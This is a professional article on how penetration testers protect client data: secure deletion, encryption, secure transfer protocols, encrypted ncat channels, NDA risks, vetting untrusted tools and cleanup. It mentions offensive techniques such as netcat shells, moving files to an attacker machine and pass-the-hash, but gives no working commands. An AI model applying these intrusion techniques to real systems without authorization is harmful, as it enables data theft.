[Editor's Note: As a professional penetration tester, target organization personnel put a lot of trust and faith in us. We must treat their sensitive information very carefully, or else we'll wind up in major hot water. In this thought-provoking article, Tony Turner provides some fantastic tips for protecting pen test customer data. Heed his warnings carefully. The tips he discusses aren't too onerous, and may just save your bacon some day. Thanks, Tony, for the excellent article! --Ed.]
By Tony Turner
It's a good day. You've just received the P.O. for another large customer where you have been engaged to perform a penetration test for them. Fortunately for your customer, you are a professional and they can rely on your ethics and experience to deliver a quality product that creates significant value in their never-ending struggle to manage technology risk within their environment. They want you to simulate a real attacker which means you can harvest credit card numbers and sell them on carder forums, post their password hashes on Pastebin and tweet about how lamebrain they are. Right?
Hopefully, you see how ludicrous the last question was and are ready to take a look at how you may be needlessly exposing your customer's data. While you may not be selling customer data, there may be instances where you have exposed customer data almost as haphazardly. Let's take a look at a few of them and see how we can do things better.
You are a penetration tester, you probably have one of the most ridiculously large attack surfaces of any system that touches the network, due to a need to support insecure protocols like older versions of NTLM or unsigned SMB, exposed applications listening for incoming connections, and the wide array of tools installed on your platform. That's a given and I won't touch on platform hardening today since that's a future topic that is deserving of its own article. You also probably use the same laptop for testing that you take to hacker conventions, use in the coffee shop, in the hotel, on the airplane and any number of other risky venues. Do you have reports you are currently working on saved to your machine? What about old reports that have already been submitted? How about results of scans with IP information or details of website vulnerabilities?
Data Reduction - If You Don't Have it, You Can't Lose it.
- Securely delete data such as old reports, scan data, asset enumeration, etc. that is no longer needed using SDelete on Windows or shred on Linux and delete database records that store sensitive information. If your laptop file system is compromised, you don't want sensitive information from previous or current customers recovered by an attacker.
I usually do a single pass and find that to be sufficient but if your requirements dictate more than this, you can increase the number of passes with the —p option. The —s option tells SDelete to recurse through directories. If you have files that have been insecurely deleted and need to clean up free space, the —z option is more secure than —c and meets requirements for the DOD 5220.22-M sanitizing standard. This option first writes bytes 0x00, then 0xFF and finally with random numbers from 0x00 to 0xFF to all free/unused space on the drive. The —c option only writes 0x00 to the drive 3 times and is not DOD compliant. Either method can be very time consuming depending on the amount of free space on the drive.
To clean files on Linux based systems, we can use shred installed by default on a Backtrack 5 R2 system as well as most modern Linux distributions or the dd command with /dev/zero or /dev/random as the input file. This is sufficient for most purposes but is not compliant with DOD 5220.22-M.
The best method I have found on Linux systems to perform a DOD 5220.22-M compliant file sanitization is using the scrub command. It is not installed by default on BT5 but if you have 'universe' enabled it can be installed with apt-get. The —p option specifies the pattern used, in this instance I have selected the 'dod' pattern. As you can see below, it follows a similar pattern as SDelete and then unlinks the file. Without the —r option it will scrub the file but leave the filename intact which may in and of itself, reveal information you do not wish to disclose.
- Use a placeholder for customer name in your reports in progress to limit exposure before the report is complete and do a "Find and Replace" when you are ready. It is understood there may still be identifying information such as domain names or IP addresses but limit this where possible until you are ready to create the final.
- Full disk encryption or file encryption at a minimum can be a very effective mechanism for protecting your customer's information. If you are using external drives to store customer data these should be encrypted as well. This really should not be an optional step. There are many articles on the internet that can provide guidance here using Truecrypt, DM-crypt with LUKS or other methods. There are many commercial options in this area as well.
- Store sensitive information within a protected environment and work on the report there. If you have a corporate VPN for your consulting practice, leverage the security controls you already have in place and minimize the local file storage of sensitive information. This can be especially effective when collaborating with other members of your team as you can utilize a shared portal such as a wiki or internal collaboration platform. You will most likely need to utilize a separate virtual machine that complies with your internal security requirements for VPN and corporate policy. This has the added benefit of separating working documentation from the default build of your insecure testing platform.
- Once you have a solid working build of your base platform, create a disk image. When you are done with an assessment, securely wipe and reimage your machine. Scrub and SDelete work great for groups of files or directories but for complete drive sanitizing I tend to use Darik's Boot and Nuke (DBAN) which is also DOD 5220.22-M compliant. Make sure if you create any custom scripts you save them for reuse on future tests, but sanitize any customer details contained within. Also be sure to securely wipe any external media containing sensitive information. DD can again come in very handy here. I have a Clonezilla server I use for this purpose which makes reimaging my laptop relatively painless. Clonezilla can work with dd images if you already have created an image of your system.
- Don't leave systems with hacking tools installed plugged into the network as you will only make life easier for criminal attackers. You should use a different system for day to day activities, or if you only have 1 machine, consider the use of a virtual machine for your pentest platform and keep it powered down when not in use.
- Depending on the requirements of the assessment, you may be tasked with retaining report information for a predetermined timeframe; 1 year seems to be common. Secure this data on encrypted external media and put it in your safe until the retention period expires and then securely destroy the information.
So, now you feel pretty good about the security of the data at rest you are responsible for safeguarding. You are engaged in the assessment and you compromise a server, only to find that there are compiled exploits sitting in the file system or some other indicators of compromise or maybe it's just time to submit the deliverables. Immediately you rush to contact the customer but you can't reach them on the phone so you send them an email with this information. Email is cleartext. Do you have PGP or GPG installed? Do you have your customer point of contact public key?
- Use PGP. PGP is relatively inexpensive but if you are operating on a budget, GPG can fit the bill as well. Using something like the GPG implementation of OpenPGP and Enigmail with Thunderbird provides a free alternative to PGP. The Enigmail site listed at the end of this article includes detailed instructions for setup.
- Use SFTP or FTPS or another secure file transfer mechanism. You could always send an unsecured email telling your customer to check the portal and they can log in and see for themselves what you are talking about. I'm going to take a minute to talk about FTPS vs SFTP vs SCP since there seems to be a great deal of confusion here. Many people think they are interchangeable but that is definitely not the case.
SCP1 is an older secure copy implementation that supports file transfer only and uses the vulnerable SSHv1 protocol for authentication and transport. It does not support directory listing and typically functions as both a client and a server. Modern versions of SSH include SCP2 which does provide support for SSHv2 and in many instances on a modern Linux when you type 'scp' it may actually be a symbolic link for SCP2 or even SFTP. GUI based SCP clients such as WinSCP usually don't use SCP as the default mechanism since functionality such as directory listing is necessary for operation. Instead they use SFTP and then SCP or SCP2 as a fallback mechanism but even then is not usually pure SCP, as they must employ other mechanisms for directory listing and other functionality such as resumption of failed file transfers. Because of this, platform dependencies may create situations where WinSCP fails to negotiate an SCP connection while a pure SCP client such as found at the command line in most Linux distributions will work.
SFTP2 does not use FTP mechanisms for file transfer and is instead a new protocol designed to be run over SSH or other secure transport mechanisms such as TLS. It relies on the transport mechanism to provide authentication and security. It is a true remote file management protocol with full support for directory browsing, file transfer, resumption of failed transfers and deletion of remote files. OpenSSH, one of the most popular SSH suites includes both SCP and SFTP functionality. This is likely to be the most easily supported and secure option of these when considering secure transfer mechanisms.
FTPS3 is the last protocol we will discuss and is designed to function as FTP over SSL/TLS. It is truly an extension to FTP and with the explicit security mode, is compatible with non-FTPS aware clients. In explicit mode, the client must explicitly request a secure mechanism to communicate with the server in a secured channel using the FTP command 'AUTH' and then the two mutually agree on an encryption method. For non-FTPS aware clients, they do not use this AUTH command and the server can then accept or deny the incoming connection based on configured policies. The client has full control over what is encrypted or not and may drop encryption for a given channel at any time contingent on the server policies. In implicit mode, it is assumed that all communications will be encrypted and non-FTPS aware clients will not be able to negotiate a connection. FTPS supports the full range of SSL/TLS encryption ciphers and hashing mechanisms, as well as support for client side certificates. Due to the nature of FTP, default firewall configurations will present challenges since the firewall cannot inspect the encrypted FTP control channel messages to determine which data channel ports need to be opened to facilitate communication. It is not recommended for use across such connections as the range of ports that would need to be opened to facilitate communication may present unnecessary risk, but for internal secure file transfer or for communication across a layer 3 VPN it can certainly be a viable option.
- When moving files and data around your customer's network, use encrypted channels where possible. Perhaps your initial compromise was facilitated by the use of netcat or telnet or bash tcp redirection or some other mechanism that does not offer encryption. Establish secure channels as soon as possible using SSH, cryptcat, ncat, SSL, VPN or other mechanism before continuing the attack and especially before pilfering all of your customer's sensitive information.
Ncat is an alternative to netcat as an improved implementation found in the nmap suite of tools. A statically linked binary can be obtained from nmap.org so it can just be copied to the target system and invoked without installation. This is probably the easiest way to get encryption support for a Netcat style tool on Windows. One of the really nice things here is the ability to specify hosts that are allowed or denied the ability to connect to the ncat listener so you can limit exposure for your ncat connection, and specify a number of connections for times when you are working with teammates who also need to leverage the connection. That's just not possible with traditional netcat without some additional hackery. Ncat also supports authenticated proxies and as you will see next, SSL.
First off, an example with traditional netcat transferring a textfile, lewtz.txt with the contents "phat lewtz" from a Windows 7 target to an Ubuntu 10.04 attacker machine.
You can clearly see the plaintext string "phat lewtz" below as it traverses the network
Now let's try the exact same file transfer using ncat and the —ssl option
And now looking at the SSL encrypted packet it appears to be sufficiently obfuscated. As you can see above, it is also possible to supply your own certs for additional trust verification.
- Don't conduct your tests from insecure locations like coffee shops or hotel wifi. If you absolutely must, consider tunneling your traffic over SSH or using a VPN through a server on the internet under your control.
Now we have secured our local systems to some degree, and are protecting customer information as it flows across the network and/or the internet. Great job! You probably signed an NDA promising that you would not disclose any information to 3rd parties. Yes that means you don't tweet about how lamebrained your customer is or make a blog post about their shortcomings and you probably already know that. But are you consuming any 3rd party services to assist you with your test? Does use of Netcraft, Nmap Online, or Firebind violate the terms of your NDA? It probably does. How about posts made to mailing lists regarding working through ongoing issues in your test?
In 2011 I saw an email to the Metasploit Framework mailing list asking for exploit/windows/smb/psexec assistance with the show options screen pasted in including username, password hash and public IP address. That's a huge exposure that should be a resume generating event (RGE). Thankfully Rapid7 redacted that information from the public mailing list archives but not all list or forum administrators are as diligent. Internal folks do this all the time with code snippets on Pastebin or revealing configuration information on mailing lists that is often searchable using Google groups or other means which is hugely valuable information when you are conducting your test. Lead by example and educate your customers.
Another disturbing trend is the use of online password crackers. These are sites where you upload a hash, they crack it and give you the results. WPA, MD5, SHA1, NTLM and various others can be found on the internet. The tester has no control over these sites, how they use this information, and degrade the quality of good passwords by exposing them to such services in addition to violating their NDA. Uploading hashes to Pastebin so your partner can crack is also a really bad idea. Reference the previous section on securing data at rest and in transit and only use systems under your control for cracking passwords. Pass the Hash attacks with Windows Credential Editor may completely obviate the need to crack hashes for Windows based systems or Linux systems using SAMBA. Use the right tool for the job.
Untrusted Tools — What Could Possibly Go Wrong?
Another way we expose customer data to 3rd parties is accidental. We've all been in a situation where we are faced with a particular problem that requires a custom tool. After doing some research we determine we could whip something up with an hour or 2 worth of Perl or Python or maybe just a nice bash script. Or we could download a tool some unknown individual created and posted to a blog or a mailing list. I've seen this many times where penetration testers are using untested tools in customer environments without first trying out in a controlled lab environment. Test your tools before using them at customer sites. Read the source code. Fire up a packet sniffer and see where the traffic goes. Treat the tool like malware until you are reasonably assured that it's not. You need to understand how they work to make sure they aren't phoning home, creating undue instability in target systems, or exposing backdoors on your or customer systems. Yes this takes time; unbillable time, likely. It's an investment in quality and reinforcement of trust for your customers. If they ask you what a particular tool does, you need to be prepared to tell them.
Clean Up After Yourself — Didn't Your Momma Teach You Anything?
Last but not least, clean up after yourself. Don't leave compiled exploits, GCC installs, hash dumps and other artifacts behind. The point of the test is to assess your target environment and communicate valuable insight into the technology risks that can compromise the organizations business objectives. If you know a compromised system is now unstable due to the exploit used, tell the customer or better yet, find a more stable means of gaining access. If you are leaving behind systems that are more vulnerable than when you found them, you are harming your customer and you may be found liable. Don't expect repeat business.
Penetration testers find themselves in a unique position where a tremendous amount of trust is placed in them. Customers have expectations that pentesters will responsibly and securely manage the assessment process and often do not understand enough to hold testers accountable. The idea that a consultant hired to perform a security assessment might not actually follow their own recommendations and create additional risk when conducting an assessment should be preposterous to most of us. Take the time to do it right. I hope this article provides a sufficient baseline for both testers and customers alike to understand what should be expected from a responsible penetration test.
About the author:
Tony Turner is an information technology veteran of over 18 years, the last 7 in information security. He has a B.S. in Information Systems Management with a focus in Information Security and Compliance from Hodges University and holds several information security certifications including GSEC, GPEN, GWAPT, GAWN, GCIA, CISSP, CISA, OPSE, CSWAE and others. Tony currently manages the information security program for a major US airport where he is responsible for penetration testing and vulnerability assessment, CSIRT coordination, compliance and policy. He is the chapter leader for OWASP Orlando and speaks regularly at DC407, OWASP, and area information security forums and events. Tony also maintains a newly created blog at http://sentinel24.com/blog where you can read about his current research.
-- Tony Turner
Download links for tools discussed: